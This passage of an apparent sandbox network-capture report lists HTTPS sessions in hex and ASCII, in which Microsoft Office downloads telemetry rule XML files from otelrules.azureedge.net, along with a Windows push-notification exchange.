                                                                                                                                                                                              Data Ascii: BND 3 CON\WNS 0 197MS-CV: p8lPThZZyUWrDLTC.3Context: 6e5fefb928d5cb0f<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                              2024-11-24 12:40:02 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                              Data Ascii: 202 1 CON 58
                                                                                                                                                                                              2024-11-24 12:40:02 UTC58INData Raw: 4d 53 2d 43 56 3a 20 32 70 6e 2f 76 48 52 45 45 55 32 59 39 7a 31 4c 51 6f 71 45 44 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                              Data Ascii: MS-CV: 2pn/vHREEU2Y9z1LQoqEDg.0Payload parsing failed.


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              124192.168.2.64989313.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:02 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:03 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1364
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                              ETag: "0x8DC582BEB6AD293"
                                                                                                                                                                                              x-ms-request-id: 38badaf1-c01e-00ad-2128-3da2b9000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124003Z-178bfbc474btrnf9hC1NYCb80g000000060g00000000dmy0
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:03 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              125192.168.2.64989413.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:03 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:03 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1391
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDF58DC7E"
                                                                                                                                                                                              x-ms-request-id: 7a9d449b-801e-0047-7f8c-3d7265000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124003Z-15b8b599d88hr8sfhC1TEBbca400000004ag000000007qkh
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:03 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              126192.168.2.64989213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:03 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:03 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1401
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE2A9D541"
                                                                                                                                                                                              x-ms-request-id: fa2bbe9c-f01e-0052-6fac-3b9224000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124003Z-15b8b599d882zv28hC1TEBdchn00000004a0000000009cwf
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:03 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              127192.168.2.64989513.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:03 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:03 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1354
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE0662D7C"
                                                                                                                                                                                              x-ms-request-id: c06a529d-f01e-0085-0e9a-3b88ea000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124003Z-15b8b599d885ffrhhC1TEBtuv000000004c000000000kpmd
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:03 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              128192.168.2.64989613.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:03 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:03 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:03 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDCDD6400"
                                                                                                                                                                                              x-ms-request-id: f26cc31d-e01e-0085-3f0e-3ec311000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124003Z-178bfbc474b7cbwqhC1NYC8z4n00000005z0000000001pkg
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:03 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              129192.168.2.64989813.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:05 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:05 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDF1E2608"
                                                                                                                                                                                              x-ms-request-id: 652d7de6-201e-0033-5d3c-3cb167000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124005Z-178bfbc474bw8bwphC1NYC38b400000005rg00000000axt0
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:05 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              130192.168.2.64989913.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:05 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:05 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                              ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                              x-ms-request-id: 20e9f7cf-701e-005c-216c-3bbb94000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124005Z-174c587ffdf6b487hC1TEBydsn000000049g00000000fdx4
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:05 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              131192.168.2.64990013.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:05 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:05 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:05 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDF497570"
                                                                                                                                                                                              x-ms-request-id: 77142413-201e-000c-6b0a-3d79c4000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124005Z-15b8b599d885v8r9hC1TEB104g00000004eg00000000b5cr
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:05 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              132192.168.2.64990113.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:05 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:05 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                              ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                              x-ms-request-id: f909f157-c01e-0049-018c-3aac27000000
                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                              x-azure-ref: 20241124T124005Z-174c587ffdftv9hphC1TEBm29w000000049g00000000fxwr
                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-11-24 12:40:06 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              133192.168.2.64990213.107.246.63443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-24 12:40:05 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                              2024-11-24 12:40:06 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Sun, 24 Nov 2024 12:40:06 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
